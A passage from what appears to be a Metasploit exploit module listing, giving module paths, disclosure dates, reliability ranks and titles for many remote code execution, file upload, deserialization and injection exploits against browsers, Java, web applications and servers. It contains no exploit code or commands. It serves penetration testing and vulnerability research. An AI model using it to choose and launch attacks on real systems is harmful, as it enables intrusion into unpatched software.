multi/browser/firefox_escape_retval 2009-07-13 normal No Firefox 3.5 escape() Return Value Memory Corruption - multi/browser/firefox_pdfjs_privilege_escalation 2015-03-31 manual No Firefox PDF.js Privileged Javascript Injection - multi/browser/firefox_proto_crmfrequest 2013-08-06 excellent No Firefox 5.0 - 15.0.1 __exposedProps__ XCS Code Execution - multi/browser/firefox_proxy_prototype 2014-01-20 manual No Firefox Proxy Prototype Privileged Javascript Injection - multi/browser/firefox_queryinterface 2006-02-02 normal No Firefox location.QueryInterface() Code Execution - multi/browser/firefox_svg_plugin 2013-01-08 excellent No Firefox 17.0.1 Flash Privileged Code Injection - multi/browser/firefox_tostring_console_injection 2013-05-14 excellent No Firefox toString console.time Privileged Javascript Injection - multi/browser/firefox_webidl_injection 2014-03-17 excellent No Firefox WebIDL Privileged Javascript Injection - multi/browser/firefox_xpi_bootstrapped_addon 2007-06-27 excellent No Mozilla Firefox Bootstrapped Addon Social Engineering Code Execution - multi/browser/itms_overflow 2009-06-01 great No Apple OS X iTunes 8.1.1 ITMS Overflow - multi/browser/java_atomicreferencearray 2012-02-14 excellent No Java AtomicReferenceArray Type Violation Vulnerability - multi/browser/java_calendar_deserialize 2008-12-03 excellent No Sun Java Calendar Deserialization Privilege Escalation - multi/browser/java_getsoundbank_bof 2009-11-04 great No Sun Java JRE getSoundbank file:// URI Buffer Overflow - multi/browser/java_jre17_driver_manager 2013-01-10 excellent No Java Applet Driver Manager Privileged toString() Remote Code Execution - multi/browser/java_jre17_exec 2012-08-26 excellent No Java 7 Applet Remote Code Execution - multi/browser/java_jre17_glassfish_averagerangestatisticimpl 2012-10-16 excellent No Java Applet AverageRangeStatisticImpl Remote Code Execution - multi/browser/java_jre17_jaxws 2012-10-16 excellent No Java Applet JAX-WS Remote Code Execution - multi/browser/java_jre17_jmxbean 2013-01-10 excellent No Java Applet JMX Remote Code Execution - multi/browser/java_jre17_jmxbean_2 2013-01-19 excellent No Java Applet JMX Remote Code Execution - multi/browser/java_jre17_method_handle 2012-10-16 excellent No Java Applet Method Handle Remote Code Execution - multi/browser/java_jre17_provider_skeleton 2013-06-18 great No Java Applet ProviderSkeleton Insecure Invoke Method - multi/browser/java_jre17_reflection_types 2013-01-10 excellent No Java Applet Reflection Type Confusion Remote Code Execution - multi/browser/java_rhino 2011-10-18 excellent No Java Applet Rhino Script Engine Remote Code Execution - multi/browser/java_rmi_connection_impl 2010-03-31 excellent No Java RMIConnectionImpl Deserialization Privilege Escalation - multi/browser/java_setdifficm_bof 2009-11-04 great No Sun Java JRE AWT setDiffICM Buffer Overflow - multi/browser/java_signed_applet 1997-02-19 excellent No Java Signed Applet Social Engineering Code Execution - multi/browser/java_storeimagearray 2013-08-12 great No Java storeImageArray() Invalid Array Indexing Vulnerability - multi/browser/java_trusted_chain 2010-03-31 excellent No Java Statement.invoke() Trusted Method Chain Privilege Escalation - multi/browser/java_verifier_field_access 2012-06-06 excellent No Java Applet Field Bytecode Verifier Cache Remote Code Execution - multi/browser/mozilla_compareto 2005-07-13 normal No Mozilla Suite/Firefox compareTo() Code Execution - multi/browser/mozilla_navigatorjava 2006-07-25 normal No Mozilla Suite/Firefox Navigator Object Code Execution - multi/browser/msfd_rce_browser 2018-04-11 normal No Metasploit msfd Remote Code Execution via Browser - multi/browser/opera_configoverwrite 2007-03-05 excellent No Opera 9 Configuration Overwrite - multi/browser/opera_historysearch 2008-10-23 excellent No Opera historysearch XSS - multi/browser/qtjava_pointer 2007-04-23 excellent No Apple QTJava toQTPointer() Arbitrary Memory Access - multi/elasticsearch/script_mvel_rce 2013-12-09 excellent Yes ElasticSearch Dynamic Script Arbitrary Java Execution - multi/elasticsearch/search_groovy_script 2015-02-11 excellent Yes ElasticSearch Search Groovy Sandbox Bypass - multi/fileformat/adobe_u3d_meshcont 2009-10-13 good No Adobe U3D CLODProgressiveMeshDeclaration Array Overrun - multi/fileformat/ghostscript_failed_restore 2018-08-21 excellent No Ghostscript Failed Restore Command Execution - multi/fileformat/js_unpacker_eval_injection 2015-02-18 excellent No Javascript Injection for Eval-based Unpackers - multi/fileformat/maple_maplet 2010-04-26 excellent No Maple Maplet File Creation and Command Execution - multi/fileformat/nodejs_js_yaml_load_code_exec 2013-06-28 excellent No Nodejs js-yaml load() Code Execution - multi/fileformat/office_word_macro 2012-01-10 excellent No Microsoft Office Word Malicious Macro Execution - multi/fileformat/peazip_command_injection 2009-06-05 excellent No PeaZip Zip Processing Command Injection - multi/fileformat/swagger_param_inject 2016-06-23 excellent No JSON Swagger CodeGen Parameter Injector - multi/ftp/pureftpd_bash_env_exec 2014-09-24 excellent Yes Pure-FTPd External Authentication Bash Environment Variable Code Injection (Shellshock) - multi/ftp/wuftpd_site_exec_format 2000-06-22 great Yes WU-FTPD SITE EXEC/INDEX Format String Vulnerability - multi/gdb/gdb_server_exec 2014-08-24 great No GDB Server Remote Payload Execution - multi/hams/steamed 2018-04-01 manual No Steamed Hams - multi/handler manual No Generic Payload Handler - multi/http/activecollab_chat 2012-05-30 excellent Yes Active Collab "chat module" Remote PHP Code Injection Exploit - multi/http/ajaxplorer_checkinstall_exec 2010-04-04 excellent Yes AjaXplorer checkInstall.php Remote Command Execution - multi/http/apache_activemq_upload_jsp 2016-06-01 excellent No ActiveMQ web shell upload - multi/http/apache_jetspeed_file_upload 2016-03-06 manual No Apache Jetspeed Arbitrary File Upload - multi/http/apache_mod_cgi_bash_env_exec 2014-09-24 excellent Yes Apache mod_cgi Bash Environment Variable Code Injection (Shellshock) - multi/http/apache_roller_ognl_injection 2013-10-31 excellent Yes Apache Roller OGNL Injection - multi/http/apprain_upload_exec 2012-01-19 excellent Yes appRain CMF Arbitrary PHP File Upload Vulnerability - multi/http/atutor_sqli 2016-03-01 excellent Yes ATutor 2.2.1 SQL Injection / Remote Code Execution - multi/http/auxilium_upload_exec 2012-09-14 excellent Yes Auxilium RateMyPet Arbitrary File Upload Vulnerability - multi/http/axis2_deployer 2010-12-30 excellent No Axis2 / SAP BusinessObjects Authenticated Code Execution (via SOAP) - multi/http/bassmaster_js_injection 2016-11-01 excellent Yes Bassmaster Batch Arbitrary JavaScript Injection Remote Code Execution - multi/http/bolt_file_upload 2015-08-17 excellent Yes CMS Bolt File Upload Vulnerability - multi/http/builderengine_upload_exec 2016-09-18 excellent Yes BuilderEngine Arbitrary File Upload Vulnerability and execution - multi/http/caidao_php_backdoor_exec 2015-10-27 excellent Yes China Chopper Caidao PHP Backdoor Code Execution - multi/http/cisco_dcnm_upload 2013-09-18 excellent Yes Cisco Prime Data Center Network Manager Arbitrary File Upload - multi/http/clipbucket_fileupload_exec 2018-03-03 excellent Yes ClipBucket beats_uploader Unauthenticated Arbitrary File Upload - multi/http/cmsms_upload_rename_rce 2018-07-03 excellent Yes CMS Made Simple Authenticated RCE via File Upload/Copy - multi/http/coldfusion_ckeditor_file_upload 2018-09-11 excellent No Adobe ColdFusion CKEditor unrestricted file upload - multi/http/coldfusion_rds 2013-08-08 great Yes Adobe ColdFusion 9 Administrative Login Bypass - multi/http/cups_bash_env_exec 2014-09-24 excellent Yes CUPS Filter Bash Environment Variable Code Injection (Shellshock) - multi/http/cuteflow_upload_exec 2012-07-27 excellent Yes CuteFlow v2.11.2 Arbitrary File Upload Vulnerability - multi/http/dexter_casinoloader_exec 2014-02-08 excellent Yes Dexter (CasinoLoader) SQL Injection - multi/http/drupal_drupageddon 2014-10-15 excellent No Drupal HTTP Parameter Key/Value SQL Injection - multi/http/eaton_nsm_code_exec 2012-06-26 excellent Yes Network Shutdown Module (sort_values) Remote PHP Code Injection - multi/http/eventlog_file_upload 2014-08-31 excellent Yes ManageEngine Eventlog Analyzer Arbitrary File Upload - multi/http/extplorer_upload_exec 2012-12-31 excellent Yes eXtplorer v2.1 Arbitrary File Upload Vulnerability - multi/http/familycms_less_exec 2011-11-29 excellent Yes Family Connections less.php Remote Command Execution - multi/http/freenas_exec_raw 2010-11-06 great No FreeNAS exec_raw.php Arbitrary Command Execution - multi/http/gestioip_exec 2013-10-04 excellent No GestioIP Remote Command Execution - multi/http/git_client_command_exec 2014-12-18 excellent No Malicious Git and Mercurial HTTP Server For CVE-2014-9390 - multi/http/git_submodule_command_exec 2017-08-10 excellent No Malicious Git HTTP Server For CVE-2017-1000117 - multi/http/git_submodule_url_exec 2018-10-05 excellent No Malicious Git HTTP Server For CVE-2018-17456 - multi/http/gitlab_shell_exec 2013-11-04 excellent Yes Gitlab-shell Code Execution - multi/http/gitlist_arg_injection 2018-04-26 excellent Yes GitList v0.6.0 Argument Injection Vulnerability - multi/http/gitorious_graph 2012-01-19 excellent No Gitorious Arbitrary Command Execution - multi/http/glassfish_deployer 2011-08-04 excellent No Sun/Oracle GlassFish Server Authenticated Code Execution - multi/http/glossword_upload_exec 2013-02-05 excellent Yes Glossword v1.8.8 - 1.8.12 Arbitrary File Upload Vulnerability - multi/http/glpi_install_rce 2013-09-12 manual Yes GLPI install.php Remote Command Execution - multi/http/horde_href_backdoor 2012-02-13 excellent No Horde 3.3.12 Backdoor Arbitrary PHP Code Execution - multi/http/hp_sitescope_issuesiebelcmd 2013-10-30 great Yes HP SiteScope issueSiebelCmd Remote Code Execution - multi/http/hp_sitescope_uploadfileshandler 2012-08-29 good No HP SiteScope Remote Code Execution - multi/http/hp_sys_mgmt_exec 2013-06-11 excellent Yes HP System Management Homepage JustGetSNMPQueue Command Injection - multi/http/hyperic_hq_script_console 2013-10-10 excellent Yes VMware Hyperic HQ Groovy Script-Console Java Execution - multi/http/ibm_openadmin_tool_soap_welcomeserver_exec 2017-05-30 excellent Yes IBM OpenAdmin Tool SOAP welcomeServer PHP Code Execution - multi/http/ispconfig_php_exec 2013-10-30 excellent No ISPConfig Authenticated Arbitrary PHP Code Execution - multi/http/jboss_bshdeployer 2010-04-26 excellent No JBoss JMX Console Beanshell Deployer WAR Upload and Deployment - multi/http/jboss_deploymentfilerepository 2010-04-26 excellent No JBoss Java Class DeploymentFileRepository WAR Deployment - multi/http/jboss_invoke_deploy 2007-02-20 excellent Yes JBoss DeploymentFileRepository WAR Deployment (via JMXInvokerServlet) - multi/http/jboss_maindeployer 2007-02-20 excellent No JBoss JMX Console Deployer Upload and Execute - multi/http/jboss_seam_upload_exec 2010-08-05 normal Yes JBoss Seam 2 File Upload and Execute - multi/http/jenkins_script_console 2013-01-18 good Yes Jenkins-CI Script-Console Java Execution - multi/http/jenkins_xstream_deserialize 2016-02-24 excellent Yes Jenkins XStream Groovy classpath Deserialization Vulnerability - multi/http/jira_hipchat_template 2015-10-28 excellent Yes Atlassian HipChat for Jira Plugin Velocity Template Injection - multi/http/jira_plugin_upload 2018-02-22 excellent Yes Atlassian Jira Authenticated Upload Code Execution - multi/http/joomla_http_header_rce 2015-12-14 excellent Yes Joomla HTTP Header Unauthenticated Remote Code Execution - multi/http/kordil_edms_upload_exec 2013-02-22 excellent Yes Kordil EDMS v2.2.60rc3 Unauthenticated Arbitrary File Upload Vulnerability - multi/http/lcms_php_exec 2011-03-03 excellent Yes LotusCMS 3.0 eval() Remote Command Execution - multi/http/log1cms_ajax_create_folder 2011-04-11 excellent Yes Log1 CMS writeInfo() PHP Code Injection - multi/http/magento_unserialize 2016-05-17 excellent Yes Magento 2.0.6 Unserialize Remote Code Execution - multi/http/makoserver_cmd_exec 2017-09-03 excellent Yes Mako Server v2.5, 2.6 OS Command Injection RCE - multi/http/manage_engine_dc_pmp_sqli 2014-06-08 excellent Yes ManageEngine Desktop Central / Password Manager LinkViewFetchServlet.dat SQL Injection - multi/http/manageengine_auth_upload 2014-12-15 excellent Yes ManageEngine Multiple Products Authenticated File Upload - multi/http/manageengine_sd_uploader 2015-08-20 excellent Yes ManageEngine ServiceDesk Plus Arbitrary File Upload - multi/http/manageengine_search_sqli 2012-10-18 excellent Yes ManageEngine Security Manager Plus 5.5 Build 5505 SQL Injection - multi/http/mantisbt_manage_proj_page_rce 2008-10-16 excellent Yes Mantis manage_proj_page PHP Code Execution - multi/http/mantisbt_php_exec 2014-11-08 great Yes MantisBT XmlImportExport Plugin PHP Code Injection Vulnerability - multi/http/mediawiki_syntaxhighlight 2017-04-06 good Yes MediaWiki SyntaxHighlight extension option injection vulnerability - multi/http/mediawiki_thumb 2014-01-28 excellent Yes MediaWiki Thumb.php Remote Command Execution - multi/http/metasploit_static_secret_key_base 2016-09-15 excellent Yes Metasploit Web UI Static secret_key_base Value - multi/http/metasploit_webui_console_command_execution 2016-08-23 excellent No Metasploit Web UI Diagnostic Console Command Execution - multi/http/mma_backdoor_upload 2012-04-02 excellent Yes Th3 MMA mma.php Backdoor Arbitrary File Upload - multi/http/mobilecartly_upload_exec 2012-08-10 excellent Yes MobileCartly 1.0 Arbitrary File Creation Vulnerability - multi/http/monstra_fileupload_exec 2017-12-18 excellent Yes Monstra CMS Authenticated Arbitrary File Upload - multi/http/moodle_cmd_exec 2013-10-30 good No Moodle Remote Command Execution - multi/http/movabletype_upgrade_exec 2013-01-07 excellent Yes Movable Type 4.2x, 4.3x Web Upgrade Remote Code Execution - multi/http/mutiny_subnetmask_exec 2012-10-22 excellent Yes Mutiny Remote Command Execution - multi/http/nas4free_php_exec 2013-10-30 great No NAS4Free Arbitrary Remote Code Execution - multi/http/navigate_cms_rce 2018-09-26 excellent Yes Navigate CMS Unauthenticated Remote Code Execution - multi/http/netwin_surgeftp_exec 2012-12-06 good Yes Netwin SurgeFTP Remote Command Execution - multi/http/nibbleblog_file_upload 2015-09-01 excellent Yes Nibbleblog File Upload Vulnerability - multi/http/novell_servicedesk_rce 2016-03-30 excellent Yes Novell ServiceDesk Authenticated File Upload - multi/http/op5_license 2012-01-05 excellent Yes OP5 license.php Remote Command Execution - multi/http/op5_welcome 2012-01-05 excellent Yes OP5 welcome Remote Command Execution - multi/http/openfire_auth_bypass 2008-11-10 excellent Yes Openfire Admin Console Authentication Bypass - multi/http/openmediavault_cmd_exec 2013-10-30 excellent No OpenMediaVault Cron Remote Command Execution - multi/http/openx_backdoor_php 2013-08-07 excellent Yes OpenX Backdoor PHP Code Execution - multi/http/opmanager_socialit_file_upload 2014-09-27 excellent Yes ManageEngine OpManager and Social IT Arbitrary File Upload - multi/http/oracle_ats_file_upload 2016-01-20 excellent Yes Oracle ATS Arbitrary File Upload - multi/http/oracle_reports_rce 2014-01-15 great Yes Oracle Forms and Reports Remote Code Execution - multi/http/oracle_weblogic_wsat_deserialization_rce 2017-10-19 excellent No Oracle WebLogic wls-wsat Component Deserialization RCE - multi/http/orientdb_exec 2017-07-13 good Yes OrientDB 2.2.x Remote Code Execution - multi/http/oscommerce_installer_unauth_code_exec 2018-04-30 excellent Yes osCommerce Installer Unauthenticated Code Execution - multi/http/pandora_upload_exec 2010-11-30 excellent Yes Pandora FMS v3.1 Auth Bypass and Arbitrary File Upload Vulnerability - multi/http/phoenix_exec 2016-07-01 excellent Yes Phoenix Exploit Kit Remote Code Execution - multi/http/php_cgi_arg_injection 2012-05-03 excellent Yes PHP CGI Argument Injection - multi/http/php_utility_belt_rce 2015-12-08 excellent Yes PHP Utility Belt Remote Code Execution - multi/http/php_volunteer_upload_exec 2012-05-28 excellent No PHP Volunteer Management System v1.0.2 Arbitrary File Upload Vulnerability - multi/http/phpfilemanager_rce 2015-08-28 excellent Yes phpFileManager 0.9.8 Remote Code Execution - multi/http/phpldapadmin_query_engine 2011-10-24 excellent Yes phpLDAPadmin query_engine Remote PHP Code Injection - multi/http/phpmailer_arg_injection 2016-12-26 manual No PHPMailer Sendmail Argument Injection - multi/http/phpmoadmin_exec 2015-03-03 excellent Yes PHPMoAdmin 1.1.2 Remote Code Execution - multi/http/phpmyadmin_3522_backdoor 2012-09-25 normal No phpMyAdmin 3.5.2.2 server_sync.php Backdoor - multi/http/phpmyadmin_lfi_rce 2018-06-19 good Yes phpMyAdmin Authenticated Remote Code Execution - multi/http/phpmyadmin_null_termination_exec 2016-06-23 excellent Yes phpMyAdmin Authenticated Remote Code Execution - multi/http/phpmyadmin_preg_replace 2013-04-25 excellent Yes phpMyAdmin Authenticated Remote Code Execution via preg_replace() - multi/http/phpscheduleit_start_date 2008-10-01 excellent Yes phpScheduleIt PHP reserve.php start_date Parameter Arbitrary Code Injection - multi/http/phptax_exec 2012-10-08 excellent Yes PhpTax pfilez Parameter Exec Remote Code Injection - multi/http/phpwiki_ploticus_exec 2014-09-11 excellent No Phpwiki Ploticus Remote Code Execution - multi/http/playsms_filename_exec 2017-05-21 excellent Yes PlaySMS sendfromfile.php Authenticated "Filename" Field Code Execution - multi/http/playsms_uploadcsv_exec 2017-05-21 excellent Yes PlaySMS import.php Authenticated CSV File Upload Code Execution - multi/http/plone_popen2 2011-10-04 excellent Yes Plone and Zope XMLTools Remote Command Execution - multi/http/pmwiki_pagelist 2011-11-09 excellent Yes PmWiki pagelist.php Remote PHP Code Injection Exploit - multi/http/polarcms_upload_exec 2012-01-21 excellent Yes PolarBear CMS PHP File Upload Vulnerability - multi/http/processmaker_exec 2013-10-24 excellent Yes ProcessMaker Open Source Authenticated PHP Code Execution - multi/http/processmaker_plugin_upload 2010-08-25 excellent No ProcessMaker Plugin Upload - multi/http/qdpm_upload_exec 2012-06-14 excellent Yes qdPM v7 Arbitrary PHP File Upload Vulnerability - multi/http/rails_actionpack_inline_exec 2016-03-01 excellent No Ruby on Rails ActionPack Inline ERB Code Execution - multi/http/rails_dynamic_render_code_exec 2016-10-16 excellent Yes Ruby on Rails Dynamic Render File Upload Remote Code Execution - multi/http/rails_json_yaml_code_exec 2013-01-28 excellent No Ruby on Rails JSON Processor YAML Deserialization Code Execution - multi/http/rails_secret_deserialization 2013-04-11 excellent No Ruby on Rails Known Secret Session Cookie Remote Code Execution - multi/http/rails_web_console_v2_code_exec 2015-06-16 excellent No Ruby on Rails Web Console (v2) Whitelist Bypass Code Execution - multi/http/rails_xml_yaml_code_exec 2013-01-07 excellent No Ruby on Rails XML Processor YAML Deserialization Code Execution - multi/http/rocket_servergraph_file_requestor_rce 2013-10-30 great Yes Rocket Servergraph Admin Center fileRequestor Remote Code Execution - multi/http/sflog_upload_exec 2012-07-06 excellent Yes Sflog! CMS 1.0 Arbitrary File Upload Vulnerability - multi/http/simple_backdoors_exec 2015-09-08 excellent Yes Simple Backdoor Shell Remote Code Execution - multi/http/sit_file_upload 2011-11-10 excellent Yes Support Incident Tracker Remote Command Execution - multi/http/snortreport_exec 2011-09-19 excellent No Snortreport nmap.php/nbtscan.php Remote Command Execution - multi/http/solarwinds_store_manager_auth_filter 2014-08-19 excellent Yes SolarWinds Storage Manager Authentication Bypass - multi/http/sonicwall_gms_upload 2012-01-17 excellent Yes SonicWALL GMS 6 Arbitrary File Upload - multi/http/sonicwall_scrutinizer_methoddetail_sqli 2014-07-24 excellent Yes Dell SonicWALL Scrutinizer 11.01 methodDetail SQL Injection - multi/http/splunk_mappy_exec 2011-12-12 excellent Yes Splunk Search Remote Code Execution - multi/http/splunk_upload_app_exec 2012-09-27 good Yes Splunk Custom App Remote Code Execution - multi/http/spree_search_exec 2011-10-05 excellent No Spreecommerce 0.60.1 Arbitrary Command Execution - multi/http/spree_searchlogic_exec 2011-04-19 excellent No Spreecommerce Arbitrary Command Execution - multi/http/struts2_code_exec_showcase 2017-07-07 excellent Yes Apache Struts 2 Struts 1 Plugin Showcase OGNL Code Execution - multi/http/struts2_content_type_ognl 2017-03-07 excellent Yes Apache Struts Jakarta Multipart Parser OGNL Injection - multi/http/struts2_namespace_ognl 2018-08-22 excellent Yes Apache Struts 2 Namespace Redirect OGNL Injection - multi/http/struts2_rest_xstream 2017-09-05 excellent Yes Apache Struts 2 REST Plugin XStream RCE - multi/http/struts_code_exec 2010-07-13 good No Apache Struts Remote Command Execution - multi/http/struts_code_exec_classloader 2014-03-06 manual No Apache Struts ClassLoader Manipulation Remote Code Execution - multi/http/struts_code_exec_exception_delegator 2012-01-06 excellent No Apache Struts Remote Command Execution - multi/http/struts_code_exec_parameters 2011-10-01 excellent Yes Apache Struts ParametersInterceptor Remote Code Execution - multi/http/struts_default_action_mapper 2013-07-02 excellent Yes Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution - multi/http/struts_dev_mode 2012-01-06 excellent Yes Apache Struts 2 Developer Mode OGNL Execution - multi/http/struts_dmi_exec 2016-04-27 excellent Yes Apache Struts Dynamic Method Invocation Remote Code Execution - multi/http/struts_dmi_rest_exec 2016-06-01 excellent Yes Apache Struts REST Plugin With Dynamic Method Invocation Remote Code Execution - multi/http/struts_include_params 2013-05-24 great Yes Apache Struts includeParams Remote Code Execution - multi/http/stunshell_eval 2013-03-23 great Yes STUNSHELL Web Shell Remote PHP Code Execution - multi/http/stunshell_exec 2013-03-23 great Yes STUNSHELL Web Shell Remote Code Execution - multi/http/sun_jsws_dav_options 2010-01-20 great Yes Sun Java System Web Server WebDAV OPTIONS Buffer Overflow - multi/http/sysaid_auth_file_upload 2015-06-03 excellent Yes SysAid Help Desk Administrator Portal Arbitrary File Upload - multi/http/sysaid_rdslogs_file_upload 2015-06-03 excellent Yes SysAid Help Desk 'rdslogs' Arbitrary File Upload - multi/http/testlink_upload_exec 2012-08-13 excellent Yes TestLink v1.9.3 Arbitrary File Upload Vulnerability - multi/http/tomcat_jsp_upload_bypass 2017-10-03 excellent Yes Tomcat RCE via JSP Upload Bypass - multi/http/tomcat_mgr_deploy 2009-11-09 excellent Yes Apache Tomcat Manager Application Deployer Authenticated Code Execution - multi/http/tomcat_mgr_upload 2009-11-09 excellent Yes Apache Tomcat Manager Authenticated Upload Code Execution - multi/http/traq_plugin_exec 2011-12-12 excellent Yes Traq admincp/common.php Remote Code Execution - multi/http/trendmicro_threat_discovery_admin_sys_time_cmdi 2017-04-10 excellent Yes Trend Micro Threat Discovery Appliance admin_sys_time.cgi Remote Command Execution - multi/http/uptime_file_upload_1 2013-11-19 excellent Yes Idera Up.Time Monitoring Station 7.0 post2file.php Arbitrary File Upload - multi/http/uptime_file_upload_2 2013-11-18 excellent Yes Idera Up.Time Monitoring Station 7.4 post2file.php Arbitrary File Upload - multi/http/v0pcr3w_exec 2013-03-23 great Yes v0pCr3w Web Shell Remote Code Execution - multi/http/vbseo_proc_deutf 2012-01-23 excellent Yes vBSEO proc_deutf() Remote PHP Code Injection - multi/http/vbulletin_unserialize 2015-11-04 excellent Yes vBulletin 5.1.2 Unserialize Code Execution - multi/http/visual_mining_netcharts_upload 2014-11-03 excellent Yes Visual Mining NetCharts Server Remote Code Execution - multi/http/vtiger_install_rce 2014-03-05 manual No Vtiger Install Unauthenticated Remote Command Execution - multi/http/vtiger_logo_upload_exec 2015-09-28 excellent Yes Vtiger CRM - Authenticated Logo Upload RCE - multi/http/vtiger_php_exec 2013-10-30 excellent Yes vTigerCRM v5.4.0/v5.3.0 Authenticated Remote Code Execution - multi/http/vtiger_soap_upload 2013-03-26 excellent Yes vTiger CRM SOAP AddEmailAttachment Arbitrary File Upload - multi/http/webnms_file_upload 2016-07-04 excellent Yes WebNMS Framework Server Arbitrary File Upload - multi/http/webpagetest_upload_exec 2012-07-13 excellent Yes WebPageTest Arbitrary PHP File Upload - multi/http/werkzeug_debug_rce 2015-06-28 excellent Yes Werkzeug Debug Shell Command Execution - multi/http/wikka_spam_exec 2011-11-30 excellent Yes WikkaWiki 1.3.2 Spam Logging PHP Injection - multi/http/wp_ninja_forms_unauthenticated_file_upload 2016-05-04 excellent Yes WordPress Ninja Forms Unauthenticated File Upload - multi/http/wp_responsive_thumbnail_slider_upload 2015-08-28 excellent Yes WordPress Responsive Thumbnail Slider Arbitrary File Upload - multi/http/x7chat2_php_exec 2014-10-27 excellent Yes X7 Chat 2.0.5 lib/message.php preg_replace() PHP Code Execution - multi/http/zabbix_script_exec 2013-10-30 excellent Yes Zabbix Authenticated Remote Command Execution - multi/http/zemra_panel_rce 2012-06-28 excellent Yes Zemra Botnet CnC Web Panel Remote Code Execution - multi/http/zenworks_configuration_management_upload 2015-04-07 excellent Yes Novell ZENworks Configuration Management Arbitrary File Upload - multi/http/zenworks_control_center_upload 2013-03-22 great Yes Novell ZENworks Configuration Management Remote Execution - multi/http/zpanel_information_disclosure_rce 2014-01-30 excellent No Zpanel Remote Unauthenticated RCE - multi/ids/snort_dce_rpc 2007-02-19 good No Snort 2 DCE/RPC Preprocessor Buffer Overflow - multi/local/allwinner_backdoor 2016-04-30 excellent Yes Allwinner 3.4 Legacy Kernel Local Privilege Escalation - multi/local/magnicomp_sysinfo_mcsiwrapper_priv_esc 2016-09-23 excellent Yes MagniComp SysInfo mcsiwrapper Privilege Escalation - multi/local/xorg_x11_suid_server 2018-10-25 good Yes Xorg X11 Server SUID privilege escalation - multi/misc/arkeia_agent_exec 2015-07-10 great Yes Western Digital Arkeia Remote Code Execution - multi/misc/batik_svg_java 2012-05-11 excellent No Squiggle 1.7 SVG Browser Java Code Execution - multi/misc/bmc_server_automation_rscd_nsh_rce 2016-03-16 excellent Yes BMC Server Automation RSCD Agent NSH Remote Command Execution - multi/misc/claymore_dual_miner_remote_manager_rce 2018-02-09 excellent Yes Nanopool Claymore Dual Miner APIs RCE - multi/misc/consul_rexec_exec 2018-08-11 excellent Yes Hashicorp Consul Remote Command Execution via Rexec - multi/misc/consul_service_exec 2018-08-11 excellent Yes Hashicorp Consul Remote Command Execution via Services API - multi/misc/erlang_cookie_rce 2009-11-20 great No Erlang Port Mapper Daemon Cookie RCE - multi/misc/hp_data_protector_exec_integutil 2014-10-02 great Yes HP Data Protector EXEC_INTEGUTIL Remote Code Execution - multi/misc/hp_vsa_exec 2011-11-11 excellent No HP StorageWorks P4000 Virtual SAN Appliance Command Execution - multi/misc/indesign_server_soap 2012-11-11 excellent Yes Adobe IndesignServer 5.5 SOAP Server Arbitrary Script Execution - multi/misc/java_jdwp_debugger 2010-03-12 good Yes Java Debug Wire Protocol Remote Code Execution - multi/misc/java_jmx_server 2013-05-22 excellent Yes Java JMX Server Insecure Configuration Java Code Execution - multi/misc/java_rmi_server 2011-10-15 excellent No Java RMI Server Insecure Default Configuration Java Code Execution - multi/misc/legend_bot_exec 2015-04-27 excellent Yes Legend Perl IRC Bot Remote Code Execution - multi/misc/msf_rpc_console 2011-05-22 excellent No Metasploit RPC Console Command Execution - multi/misc/msfd_rce_remote 2018-04-11 excellent Yes Metasploit msfd Remote Code Execution - multi/misc/nodejs_v8_debugger 2016-08-15 excellent Yes NodeJS Debugger Command Injection - multi/misc/openoffice_document_macro 2017-02-08 excellent No Apache OpenOffice Text Document Malicious Macro Execution - multi/misc/openview_omniback_exec 2001-02-28 excellent Yes HP OpenView OmniBack II Command Execution - multi/misc/osgi_console_exec 2018-02-13 normal Yes Eclipse Equinoxe OSGi Console Command Execution - multi/misc/pbot_exec 2009-11-02 excellent Yes PHP IRC Bot pbot eval() Remote Code Execution - multi/misc/persistent_hpca_radexec_exec 2014-01-02 great Yes HP Client Automation Command Injection - multi/misc/ra1nx_pubcall_exec 2013-03-24 great Yes Ra1NX PHP Bot PubCall Authentication Bypass Remote Code Execution - multi/misc/teamcity_agent_xmlrpc_exec 2015-04-14 excellent Yes TeamCity Agent XML-RPC Command Execution - multi/misc/veritas_netbackup_cmdexec 2004-10-21 excellent Yes VERITAS NetBackup Remote Command Execution - multi/misc/w3tw0rk_exec 2015-06-04 excellent Yes w3tw0rk / Pitbul IRC Bot Remote Code Execution - multi/misc/weblogic_deserialize 2018-04-17 manual Yes Oracle Weblogic Server Deserialization RCE - multi/misc/wireshark_lwres_getaddrbyname 2010-01-27 great No Wireshark LWRES Dissector getaddrsbyname_request Buffer Overflow - multi/misc/wireshark_lwres_getaddrbyname_loop 2010-01-27 great No Wireshark LWRES Dissector getaddrsbyname_request Buffer Overflow (loop) - multi/misc/xdh_x_exec 2015-12-04 excellent Yes Xdh / LinuxNet Perlbot / fBot IRC Bot Remote Code Execution - multi/misc/zend_java_bridge 2011-03-28 great No Zend Server Java Bridge Arbitrary Java Code Execution - multi/mysql/mysql_udf_payload 2009-01-16 excellent No Oracle MySQL UDF Payload Execution - multi/ntp/ntp_overflow 2001-04-04 good No NTP Daemon readvar Buffer Overflow - multi/php/php_unserialize_zval_cookie 2007-03-04 average Yes PHP 4 unserialize() ZVAL Reference Counter Overflow (Cookie) - multi/php/wp_duplicator_code_inject 2018-08-29 manual Yes Snap Creek Duplicator WordPress plugin code injection - multi/postgres/postgres_createlang 2016-01-01 good Yes PostgreSQL CREATE LANGUAGE Execution - multi/realserver/describe 2002-12-20 great Yes RealServer Describe Buffer Overflow - multi/samba/nttrans 2003-04-07 average No Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow - multi/samba/usermap_script 2007-05-14 excellent No Samba "username map script" Command Execution - multi/sap/sap_mgmt_con_osexec_payload 2011-03-08 excellent Yes SAP Management Console OSExecute Payload Execution - multi/sap/sap_soap_rfc_sxpg_call_system_exec 2013-03-26 great Yes SAP SOAP RFC SXPG_CALL_SYSTEM Remote Command Execution - multi/sap/sap_soap_rfc_sxpg_command_exec 2012-05-08 great Yes SAP SOAP RFC SXPG_COMMAND_EXECUTE Remote Command Execution - multi/script/web_delivery 2013-07-19 manual No Script Web Delivery - multi/ssh/sshexec 1999-01-01 manual No SSH User Code Execution - multi/svn/svnserve_date 2004-05-19 average No Subversion Date Svnserve - multi/upnp/libupnp_ssdp_overflow 2013-01-29 normal No Portable UPnP SDK unique_service_name() Remote Code Execution - multi/vnc/vnc_keyboard_exec 2015-07-10 great No VNC Keyboard Remote Code Execution - multi/vpn/tincd_bof 2013-04-22 average No Tincd Post-Authentication Remote TCP Stack Buffer Overflow - multi/wyse/hagent_untrusted_hsdata 2009-07-10 excellent No Wyse Rapport Hagent Fake Hserver Command Execution - netware/smb/lsass_cifs 2007-01-21 average No Novell 